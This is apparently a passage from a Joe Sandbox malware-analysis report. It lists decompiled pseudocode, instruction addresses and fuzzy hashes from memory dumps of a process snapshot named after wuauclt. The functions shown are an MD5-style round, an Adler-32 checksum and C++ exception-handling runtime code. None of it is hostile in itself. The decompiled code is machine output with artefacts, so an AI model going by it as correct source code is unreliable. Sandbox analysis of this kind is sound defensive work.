				_t394 = (( !_t716 | _t672) ^ _t759) + _v52;
				asm("rol ecx, 0x15");
				 *((intOrPtr*)(_t427 + 4)) =  *((intOrPtr*)(_t427 + 4)) + _v88 + 0xeb86d391 + _t394 + _t672;
				 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t427 + 0xc)) + _t759;
				return _t394;
			}






































































































                                                0x00253d7d
                                                0x00253d83
                                                0x00253d8f
                                                0x00253d91
                                                0x00253d94
                                                0x00253d97
                                                0x00253d9a
                                                0x00253daa
                                                0x00253db1
                                                0x00253db4
                                                0x00253db7
                                                0x00253dba
                                                0x00253dc7
                                                0x00253dd8
                                                0x00253ddd
                                                0x00253de0
                                                0x00253de3
                                                0x00253de5
                                                0x00253e07
                                                0x00253e0a
                                                0x00253e2a
                                                0x00253e31
                                                0x00253e34
                                                0x00253e4e
                                                0x00253e51
                                                0x00253e5c
                                                0x00253e76
                                                0x00253e79
                                                0x00253e7c
                                                0x00253e9b
                                                0x00253ea0
                                                0x00253ea3
                                                0x00253ec0
                                                0x00253ec5
                                                0x00253ec8
                                                0x00253ee5
                                                0x00253ee8
                                                0x00253eea
                                                0x00253f0a
                                                0x00253f0d
                                                0x00253f0f
                                                0x00253f2f
                                                0x00253f34
                                                0x00253f37
                                                0x00253f3b
                                                0x00253f57
                                                0x00253f5c
                                                0x00253f5f
                                                0x00253f63
                                                0x00253f7f
                                                0x00253f84
                                                0x00253f87
                                                0x00253f8b
                                                0x00253fa4
                                                0x00253faa
                                                0x00253fac
                                                0x00253fb1
                                                0x00253fb3
                                                0x00253fd1
                                                0x00253fd4
                                                0x00253fdb
                                                0x00253fdd
                                                0x00253ffb
                                                0x00254006
                                                0x00254009
                                                0x00254020
                                                0x00254023
                                                0x00254032
                                                0x00254037
                                                0x0025404e
                                                0x00254053
                                                0x0025406c
                                                0x00254071
                                                0x00254088
                                                0x0025408d
                                                0x002540a2
                                                0x002540a5
                                                0x002540bc
                                                0x002540c1
                                                0x002540dc
                                                0x002540e1
                                                0x002540f8
                                                0x002540fd
                                                0x00254112
                                                0x00254117
                                                0x0025411b
                                                0x00254131
                                                0x00254136
                                                0x0025414f
                                                0x0025415d
                                                0x00254161
                                                0x00254177
                                                0x0025417a
                                                0x00254189
                                                0x0025418e
                                                0x002541ae
                                                0x002541b3
                                                0x002541c6
                                                0x002541c9
                                                0x002541db
                                                0x002541de
                                                0x002541ec
                                                0x002541ef
                                                0x00254203
                                                0x00254206
                                                0x00254208
                                                0x0025421a
                                                0x0025421d
                                                0x0025422e
                                                0x00254231
                                                0x0025423f
                                                0x00254242
                                                0x00254256
                                                0x00254259
                                                0x0025425b
                                                0x0025426b
                                                0x00254270
                                                0x00254281
                                                0x00254284
                                                0x00254288
                                                0x00254295
                                                0x00254298
                                                0x002542b4
                                                0x002542b7
                                                0x002542b9
                                                0x002542c8
                                                0x002542cb
                                                0x002542d8
                                                0x002542db
                                                0x002542e9
                                                0x002542ec
                                                0x00254300
                                                0x00254303
                                                0x00254317
                                                0x0025431a
                                                0x0025432c
                                                0x00254331
                                                0x00254341
                                                0x00254344
                                                0x0025435c
                                                0x0025435f
                                                0x00254373
                                                0x00254376
                                                0x0025438a
                                                0x0025438d
                                                0x002543a1
                                                0x002543a4
                                                0x002543b8
                                                0x002543bb
                                                0x002543d5
                                                0x002543d8
                                                0x002543ec
                                                0x002543ef
                                                0x00254401
                                                0x00254406
                                                0x00254411
                                                0x00254414
                                                0x00254432
                                                0x00254435
                                                0x00254439
                                                0x00254450
                                                0x00254453
                                                0x00254467
                                                0x0025446a
                                                0x00254472
                                                0x00254480
                                                0x00254484
                                                0x00254487
                                                0x00254489
                                                0x00254490
                                                0x00254495
                                                0x0025449a
                                                0x0025449d
                                                0x002544a6

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa8658c85613ced82dfeca77f2776ce9f118c4d8b26c411ab2ff9fc24b9d229e
                                                • Instruction ID: f6db76bcd502181040f99abea675bf97f3b77afa9c55846372d6e750a5549f03
                                                • Opcode Fuzzy Hash: fa8658c85613ced82dfeca77f2776ce9f118c4d8b26c411ab2ff9fc24b9d229e
                                                • Instruction Fuzzy Hash: EC3250B7F515144BDB4CCA9DCCA27ECB2E3AFD8314B0E813DA40AE3345EA79D9158A44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00252510 Relevance: .1, Instructions: 127COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00252510() {
				unsigned int _t28;
				unsigned int _t35;
				signed int _t38;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				unsigned int _t96;
				signed int _t97;
				unsigned int _t114;
				signed int _t117;
				void* _t119;

				_t114 =  *(_t119 + 0xc);
				_t96 =  *(_t119 + 0xc);
				_t38 = _t96 & 0x0000ffff;
				_t97 = _t96 >> 0x10;
				if(_t114 != 0) {
					_t35 =  *(_t119 + 0x18);
					if(_t35 > 0) {
						do {
							_t28 = _t35;
							if(_t35 >= 0x15b0) {
								_t28 = 0x15b0;
							}
							_t35 = _t35 - _t28;
							if(_t28 >= 0x10) {
								_t117 = _t28 >> 4;
								_t28 = _t28 + ( ~_t117 << 4);
								do {
									_t114 = _t114 + 0x10;
									_t40 = _t38;
									_t41 = _t40;
									_t42 = _t41;
									_t43 = _t42;
									_t44 = _t43;
									_t45 = _t44;
									_t46 = _t45;
									_t47 = _t46;
									_t48 = _t47;
									_t49 = _t48;
									_t50 = _t49;
									_t51 = _t50;
									_t52 = _t51;
									_t53 = _t52;
									_t54 = _t53;
									_t38 = _t54;
									_t97 = _t97 + _t40 + _t41 + _t42 + _t43 + _t44 + _t45 + _t46 + _t47 + _t48 + _t49 + _t50 + _t51 + _t52 + _t53 + _t54 + _t38;
									_t117 = _t117 - 1;
								} while (_t117 != 0);
							}
							if(_t28 != 0) {
								do {
									_t38 = _t38;
									_t114 = _t114 + 1;
									_t97 = _t97 + _t38;
									_t28 = _t28 - 1;
								} while (_t28 != 0);
							}
							_t38 = _t38 % 0xfff1;
							_t97 = _t97 % 0xfff1;
						} while (_t35 > 0);
					}
					return _t97 << 0x00000010 | _t38;
				} else {
					return 1;
				}
			}


























                                                0x00252511
                                                0x00252516
                                                0x0025251c
                                                0x00252522
                                                0x00252527
                                                0x00252532
                                                0x00252538
                                                0x0025253f
                                                0x00252545
                                                0x00252547
                                                0x00252549
                                                0x00252549
                                                0x0025254e
                                                0x00252553
                                                0x0025255b
                                                0x00252565
                                                0x00252567
                                                0x0025256b
                                                0x0025256e
                                                0x00252577
                                                0x00252580
                                                0x00252589
                                                0x00252592
                                                0x0025259b
                                                0x002525a4
                                                0x002525ad
                                                0x002525b6
                                                0x002525bf
                                                0x002525c8
                                                0x002525d1
                                                0x002525da
                                                0x002525e3
                                                0x002525ec
                                                0x002525f5
                                                0x002525f7
                                                0x002525f9
                                                0x002525f9
                                                0x00252567
                                                0x00252602
                                                0x00252604
                                                0x00252608
                                                0x0025260a
                                                0x0025260b
                                                0x0025260d
                                                0x0025260d
                                                0x00252604
                                                0x00252622
                                                0x0025262a
                                                0x0025262a
                                                0x00252632
                                                0x0025263d
                                                0x0025252a
                                                0x00252530
                                                0x00252530

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                • Instruction ID: b0be640dbdc030b12a352ebfe7b21b92f474fa39e39ede490b27f06c3d6336c3
                                                • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
                                                • Instruction Fuzzy Hash: 8B315E3374558203F71DCE2F9CA12BEEAD74FD622872DD47E98C587356ECB9842A4144
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025882C Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 67%
                                                			E0025882C(signed int* __ecx, signed int __edx, intOrPtr* _a4, intOrPtr _a8, signed int* _a12, intOrPtr _a16, signed int* _a20, char _a24, intOrPtr _a28, signed int _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				char _v5;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v72;
				intOrPtr* _v80;
				signed int _v100;
				signed int* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t190;
				signed int* _t198;
				intOrPtr* _t199;
				signed int _t202;
				signed int _t206;
				intOrPtr* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t221;
				void* _t225;
				signed int _t227;
				void* _t231;
				void* _t233;
				char _t234;
				signed int* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t240;
				signed int _t244;
				void* _t246;
				void* _t248;
				void* _t251;
				intOrPtr _t253;
				intOrPtr _t254;
				void* _t256;
				char _t257;
				signed int _t263;
				char* _t267;
				intOrPtr _t273;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				char _t283;
				intOrPtr _t285;
				signed int _t287;
				signed int* _t289;
				intOrPtr* _t290;
				signed int* _t292;
				signed int _t294;
				intOrPtr _t300;
				intOrPtr* _t304;
				signed int _t305;
				void* _t306;
				signed int* _t310;
				void* _t313;
				void* _t314;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t319;

				_t282 = __edx;
				_t264 = __ecx;
				_t253 = _a8;
				_push(_t304);
				_t289 = _a20;
				_v44 = 0;
				_v5 = 0;
				if(_t289[1] > 0x80) {
					_t190 =  *((intOrPtr*)(_t253 + 8));
				} else {
					_t190 =  *((char*)(_t253 + 8));
				}
				_v12 = _t190;
				if(_t190 < 0xffffffff || _t190 >= _t289[1]) {
					L62:
					E0025D148(_t264, _t282, _t289);
					goto L63;
				} else {
					_t304 = _a4;
					if( *_t304 != 0xe06d7363) {
						_t264 = _a12;
						goto L57;
					} else {
						if( *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
							L23:
							_t264 = _a12;
							_v16 = _t264;
							goto L25;
						} else {
							_t328 =  *((intOrPtr*)(_t304 + 0x1c));
							if( *((intOrPtr*)(_t304 + 0x1c)) != 0) {
								goto L23;
							} else {
								_t225 = E00259852(_t253, _t264, _t282, _t289, _t304, _t328);
								_t329 =  *((intOrPtr*)(_t225 + 0x10));
								if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
									L61:
									return _t225;
								} else {
									_t304 =  *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, _t329) + 0x10));
									_t246 = E00259852(_t253, _t264, _t282, _t289, _t304, _t329);
									_v44 = 1;
									_v16 =  *((intOrPtr*)(_t246 + 0x14));
									if(_t304 == 0) {
										goto L62;
									} else {
										if( *_t304 != 0xe06d7363 ||  *((intOrPtr*)(_t304 + 0x10)) != 3 ||  *((intOrPtr*)(_t304 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
											L19:
											_t248 = E00259852(_t253, _t264, _t282, _t289, _t304, _t336);
											_t337 =  *((intOrPtr*)(_t248 + 0x1c));
											if( *((intOrPtr*)(_t248 + 0x1c)) == 0) {
												L24:
												_t264 = _v16;
												_t190 = _v12;
												L25:
												__eflags =  *_t304 - 0xe06d7363;
												if( *_t304 != 0xe06d7363) {
													L57:
													__eflags = _t289[3];
													if(__eflags <= 0) {
														goto L60;
													} else {
														__eflags = _a24;
														if(__eflags != 0) {
															goto L62;
														} else {
															_push(_a32);
															_push(_a28);
															_push(_t190);
															_push(_t289);
															_push(_a16);
															_push(_t264);
															_push(_t253);
															_push(_t304);
															L66();
															_t316 = _t316 + 0x20;
															goto L60;
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t304 + 0x10)) - 3;
													if( *((intOrPtr*)(_t304 + 0x10)) != 3) {
														goto L57;
													} else {
														__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930520;
														if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930520) {
															L30:
															__eflags = _t289[3];
															if(_t289[3] > 0) {
																_t264 =  &_v28;
																_t233 = E00259AB9( &_v28, _t289, _a28, _t190,  &_v28,  &_v48);
																_t282 = _v28;
																_t316 = _t316 + 0x14;
																__eflags = _t282 - _v48;
																if(_t282 < _v48) {
																	_t47 = _t233 + 0x10; // 0x10
																	_t278 = _t47;
																	_t234 = _v12;
																	_v36 = _t278;
																	do {
																		_t50 = _t278 - 0x10; // 0x0
																		_v60 = _t50;
																		_t289 = _a20;
																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
																				_v24 =  *_t278;
																				_t263 =  *(_t278 - 4);
																				__eflags = _t263;
																				_v32 = _t263;
																				_t253 = _a8;
																				if(_t263 > 0) {
																					_t279 = _v24;
																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
																					_t287 =  *_t236;
																					_t237 =  &(_t236[1]);
																					__eflags = _t237;
																					_v52 = _t237;
																					_t238 = _v32;
																					_v56 = _t287;
																					while(1) {
																						_v20 = _v52;
																						_t289 = _a20;
																						_v40 = _t287;
																						__eflags = _t287;
																						if(_t287 <= 0) {
																							goto L41;
																						} else {
																							goto L38;
																						}
																						while(1) {
																							L38:
																							_t240 = E00259179(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
																							_t316 = _t316 + 0xc;
																							__eflags = _t240;
																							if(_t240 != 0) {
																								break;
																							}
																							_v20 = _v20 + 4;
																							_t244 = _v40 - 1;
																							_t279 = _v24;
																							_v40 = _t244;
																							__eflags = _t244;
																							if(_t244 > 0) {
																								continue;
																							} else {
																								_t238 = _v32;
																								goto L41;
																							}
																							L44:
																							_t282 = _v28;
																							_t278 = _v36;
																							_t234 = _v12;
																							goto L45;
																						}
																						_push(_v44);
																						_v5 = 1;
																						E00258767(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
																						_t316 = _t316 + 0x2c;
																						goto L44;
																						L41:
																						_t238 = _t238 - 1;
																						_t279 = _t279 + 0x10;
																						_v32 = _t238;
																						_v24 = _t279;
																						__eflags = _t238;
																						if(_t238 > 0) {
																							_t287 = _v56;
																							_v20 = _v52;
																							_t289 = _a20;
																							_v40 = _t287;
																							__eflags = _t287;
																							if(_t287 <= 0) {
																								goto L41;
																							} else {
																								goto L38;
																							}
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																		L45:
																		_t282 = _t282 + 1;
																		_t278 = _t278 + 0x14;
																		_v28 = _t282;
																		_v36 = _t278;
																		__eflags = _t282 - _v48;
																	} while (_t282 < _v48);
																}
															}
															__eflags = _a24;
															if(_a24 != 0) {
																_push(1);
																E002584A4();
																_t264 = _t304;
															}
															__eflags = _v5;
															if(__eflags != 0) {
																L60:
																_t225 = E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
																__eflags =  *(_t225 + 0x1c);
																if( *(_t225 + 0x1c) != 0) {
																	goto L62;
																} else {
																	goto L61;
																}
															} else {
																_t227 =  *_t289 & 0x1fffffff;
																__eflags = _t227 - 0x19930521;
																if(__eflags < 0) {
																	goto L60;
																} else {
																	__eflags = _t289[7];
																	if(_t289[7] != 0) {
																		L52:
																		__eflags = _t289[8] & 0x00000004;
																		if((_t289[8] & 0x00000004) != 0) {
																			goto L62;
																		} else {
																			_push(_t289[7]);
																			L86();
																			_t264 = _t304;
																			__eflags = _t227;
																			if(__eflags != 0) {
																				goto L60;
																			} else {
																				E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
																				E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
																				 *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
																				_t231 = E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
																				__eflags = _a32;
																				_t267 = _v16;
																				_push(_t304);
																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
																				if(_a32 != 0) {
																					goto L64;
																				} else {
																					_push(_t253);
																				}
																				goto L65;
																			}
																		}
																	} else {
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags == 0) {
																			goto L60;
																		} else {
																			goto L52;
																		}
																	}
																}
															}
														} else {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
																goto L30;
															} else {
																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
																	goto L57;
																} else {
																	goto L30;
																}
															}
														}
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
												_t251 = E00259852(_t253, _t264, _t282, _t289, _t304, _t337);
												_push(_v36);
												_push(_t304);
												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
												L86();
												if(_t251 != 0) {
													goto L24;
												} else {
													_push(_v36);
													L99();
													_pop(_t264);
													_t339 = _t251;
													if(_t251 == 0) {
														goto L62;
													} else {
													}
													L63:
													_push(1);
													_push(_t304);
													E002584A4();
													_t267 =  &_v72;
													E00258559(_t267);
													E002595BC( &_v72, 0x26f95c);
													L64:
													_push(_a32);
													L65:
													E00259B63(_t267);
													_push(_a16);
													_push(_t253);
													E00258FB5(_t253, _t267, _t282, _t289);
													_t317 = _t316 + 0x10;
													_push(_t289[7]);
													_t198 = E0025872D(_t253, _t267, _t282, _t289, _t304, _t339);
													asm("int3");
													_t313 = _t317;
													_push(_t267);
													_push(_t267);
													_push(_t289);
													_t290 = _v80;
													_t340 =  *_t290 - 0x80000003;
													if( *_t290 == 0x80000003) {
														L84:
														return _t198;
													} else {
														_t199 = E00259852(_t253, _t267, _t282, _t290, _t304, _t340, _t304, _t253);
														_t254 = _a16;
														_t341 =  *((intOrPtr*)(_t199 + 8));
														if( *((intOrPtr*)(_t199 + 8)) == 0) {
															L72:
															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
																E0025D148(_t267, _t282, _t290);
																asm("int3");
																_push(_t313);
																_t314 = _t317;
																_t318 = _t317 - 0x18;
																_push(_t254);
																_push(_t304);
																_t305 = _v100;
																_push(_t290);
																__eflags = _t305;
																if(_t305 == 0) {
																	E0025D148(_t267, _t282, _t290);
																	asm("int3");
																	_push(_t314);
																	_push(_t254);
																	_push(_t305);
																	_push(_t290);
																	_t292 = _v144;
																	_t306 = 0;
																	__eflags =  *_t292;
																	if( *_t292 <= 0) {
																		L103:
																		_t202 = 0;
																		__eflags = 0;
																	} else {
																		_t256 = 0;
																		while(1) {
																			_t206 = E0025967C( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x273504);
																			__eflags = _t206;
																			if(_t206 == 0) {
																				break;
																			}
																			_t306 = _t306 + 1;
																			_t256 = _t256 + 0x10;
																			__eflags = _t306 -  *_t292;
																			if(_t306 <  *_t292) {
																				continue;
																			} else {
																				goto L103;
																			}
																			goto L104;
																		}
																		_t202 = 1;
																	}
																	L104:
																	return _t202;
																} else {
																	_t294 =  *_t305;
																	_t257 = 0;
																	__eflags = _t294;
																	if(_t294 > 0) {
																		_t283 = 0;
																		_v16 = 0;
																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
																		_t211 = _t210 + 4;
																		__eflags = _t211;
																		_v28 =  *_t210;
																		_v36 = _t211;
																		do {
																			_t271 = _t211;
																			_t212 = _v28;
																			_v24 = _t211;
																			_v20 = _t212;
																			__eflags = _t212;
																			if(_t212 > 0) {
																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
																				__eflags = _t214;
																				_v32 = _t214;
																				while(1) {
																					_t215 = E00259179(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
																					_t318 = _t318 + 0xc;
																					__eflags = _t215;
																					if(_t215 != 0) {
																						break;
																					}
																					_t217 = _v20 - 1;
																					_t271 = _v24 + 4;
																					_v20 = _t217;
																					__eflags = _t217;
																					_v24 = _v24 + 4;
																					_t214 = _v32;
																					if(_t217 > 0) {
																						continue;
																					} else {
																					}
																					L95:
																					_t283 = _v16;
																					goto L96;
																				}
																				_t257 = 1;
																				goto L95;
																			}
																			L96:
																			_t211 = _v36;
																			_t283 = _t283 + 0x10;
																			_v16 = _t283;
																			_t294 = _t294 - 1;
																			__eflags = _t294;
																		} while (_t294 != 0);
																	}
																	return _t257;
																}
															} else {
																_t198 = E00259AB9(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
																_t273 = _v16;
																_t319 = _t317 + 0x14;
																_t285 = _v12;
																if(_t273 < _t285) {
																	_t137 =  &(_t198[3]); // 0xc
																	_t310 = _t137;
																	_t198 = _a20;
																	do {
																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
																			_t221 =  *_t310 << 4;
																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
																				L79:
																				_t222 = _t221 + _t310[1] + 0xfffffff0;
																				_t300 = _v0;
																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
																					_push(1);
																					_t155 = _t310 - 0xc; // 0x0
																					E00258767(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
																					_t285 = _v12;
																					_t319 = _t319 + 0x2c;
																					_t273 = _v16;
																				}
																			} else {
																				_t285 = _v12;
																				_t254 = _a16;
																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
																					goto L79;
																				}
																			}
																			_t198 = _a20;
																		}
																		_t273 = _t273 + 1;
																		_t310 =  &(_t310[5]);
																		_v16 = _t273;
																	} while (_t273 < _t285);
																}
																goto L83;
															}
														} else {
															__imp__EncodePointer(0);
															_t304 = _t199;
															if( *((intOrPtr*)(E00259852(_t254, _t267, _t282, _t290, _t304, _t341) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
																goto L72;
															} else {
																_t198 = E002599DC(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
																_t317 = _t317 + 0x1c;
																if(_t198 != 0) {
																	L83:
																	goto L84;
																} else {
																	goto L72;
																}
															}
														}
													}
												}
											}
										} else {
											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
												goto L62;
											} else {
												goto L19;
											}
										}
									}
								}
							}
						}
					}
				}
			}
















































































                                                0x0025882c
                                                0x0025882c
                                                0x00258833
                                                0x00258836
                                                0x00258838
                                                0x0025883b
                                                0x0025883f
                                                0x0025884a
                                                0x00258852
                                                0x0025884c
                                                0x0025884c
                                                0x0025884c
                                                0x00258855
                                                0x0025885b
                                                0x00258b45
                                                0x00258b45
                                                0x00000000
                                                0x0025886a
                                                0x0025886a
                                                0x00258873
                                                0x00258b0e
                                                0x00000000
                                                0x00258879
                                                0x0025887d
                                                0x00258951
                                                0x00258951
                                                0x00258954
                                                0x00000000
                                                0x002588a2
                                                0x002588a2
                                                0x002588a6
                                                0x00000000
                                                0x002588ac
                                                0x002588ac
                                                0x002588b1
                                                0x002588b5
                                                0x00258b3e
                                                0x00258b44
                                                0x002588bb
                                                0x002588c0
                                                0x002588c3
                                                0x002588c8
                                                0x002588cf
                                                0x002588d4
                                                0x00000000
                                                0x002588da
                                                0x002588e0
                                                0x0025890d
                                                0x0025890d
                                                0x00258912
                                                0x00258916
                                                0x00258959
                                                0x00258959
                                                0x0025895c
                                                0x0025895f
                                                0x0025895f
                                                0x00258965
                                                0x00258b11
                                                0x00258b11
                                                0x00258b15
                                                0x00000000
                                                0x00258b17
                                                0x00258b17
                                                0x00258b1b
                                                0x00000000
                                                0x00258b1d
                                                0x00258b1d
                                                0x00258b20
                                                0x00258b23
                                                0x00258b24
                                                0x00258b25
                                                0x00258b28
                                                0x00258b29
                                                0x00258b2a
                                                0x00258b2b
                                                0x00258b30
                                                0x00000000
                                                0x00258b30
                                                0x00258b1b
                                                0x0025896b
                                                0x0025896b
                                                0x0025896f
                                                0x00000000
                                                0x00258975
                                                0x00258975
                                                0x0025897c
                                                0x00258994
                                                0x00258994
                                                0x00258998
                                                0x002589a2
                                                0x002589ab
                                                0x002589b0
                                                0x002589b3
                                                0x002589b6
                                                0x002589b9
                                                0x002589bf
                                                0x002589bf
                                                0x002589c2
                                                0x002589c5
                                                0x002589c8
                                                0x002589c8
                                                0x002589cb
                                                0x002589ce
                                                0x002589d1
                                                0x002589d4
                                                0x002589da
                                                0x002589dd
                                                0x002589e5
                                                0x002589e8
                                                0x002589eb
                                                0x002589ed
                                                0x002589f0
                                                0x002589f3
                                                0x002589fc
                                                0x002589ff
                                                0x00258a02
                                                0x00258a04
                                                0x00258a04
                                                0x00258a07
                                                0x00258a0a
                                                0x00258a0d
                                                0x00258a10
                                                0x00258a13
                                                0x00258a16
                                                0x00258a19
                                                0x00258a1c
                                                0x00258a1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258a20
                                                0x00258a20
                                                0x00258a29
                                                0x00258a2e
                                                0x00258a31
                                                0x00258a33
                                                0x00000000
                                                0x00000000
                                                0x00258a38
                                                0x00258a3c
                                                0x00258a3d
                                                0x00258a40
                                                0x00258a43
                                                0x00258a45
                                                0x00000000
                                                0x00258a47
                                                0x00258a47
                                                0x00000000
                                                0x00258a47
                                                0x00258a86
                                                0x00258a86
                                                0x00258a89
                                                0x00258a8c
                                                0x00000000
                                                0x00258a8c
                                                0x00258a5d
                                                0x00258a66
                                                0x00258a7e
                                                0x00258a83
                                                0x00000000
                                                0x00258a4a
                                                0x00258a4a
                                                0x00258a4b
                                                0x00258a4e
                                                0x00258a51
                                                0x00258a54
                                                0x00258a56
                                                0x00258a58
                                                0x00258a13
                                                0x00258a16
                                                0x00258a19
                                                0x00258a1c
                                                0x00258a1e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258a1e
                                                0x00000000
                                                0x00258a56
                                                0x00258a10
                                                0x002589f3
                                                0x002589dd
                                                0x00258a8f
                                                0x00258a8f
                                                0x00258a90
                                                0x00258a93
                                                0x00258a96
                                                0x00258a99
                                                0x00258a99
                                                0x002589c8
                                                0x002589b9
                                                0x00258aa2
                                                0x00258aa6
                                                0x00258aa8
                                                0x00258aab
                                                0x00258ab1
                                                0x00258ab1
                                                0x00258ab2
                                                0x00258ab6
                                                0x00258b33
                                                0x00258b33
                                                0x00258b38
                                                0x00258b3c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258ab8
                                                0x00258aba
                                                0x00258abf
                                                0x00258ac4
                                                0x00000000
                                                0x00258ac6
                                                0x00258ac6
                                                0x00258aca
                                                0x00258ad2
                                                0x00258ad2
                                                0x00258ad6
                                                0x00000000
                                                0x00258ad8
                                                0x00258ad8
                                                0x00258adc
                                                0x00258ae2
                                                0x00258ae3
                                                0x00258ae5
                                                0x00000000
                                                0x00258ae7
                                                0x00258ae7
                                                0x00258aec
                                                0x00258af6
                                                0x00258af9
                                                0x00258afe
                                                0x00258b02
                                                0x00258b05
                                                0x00258b06
                                                0x00258b09
                                                0x00000000
                                                0x00258b0b
                                                0x00258b0b
                                                0x00258b0b
                                                0x00000000
                                                0x00258b09
                                                0x00258ae5
                                                0x00258acc
                                                0x00258acc
                                                0x00258ad0
                                                0x00000000
                                                0x00000000
                                                0x00000000
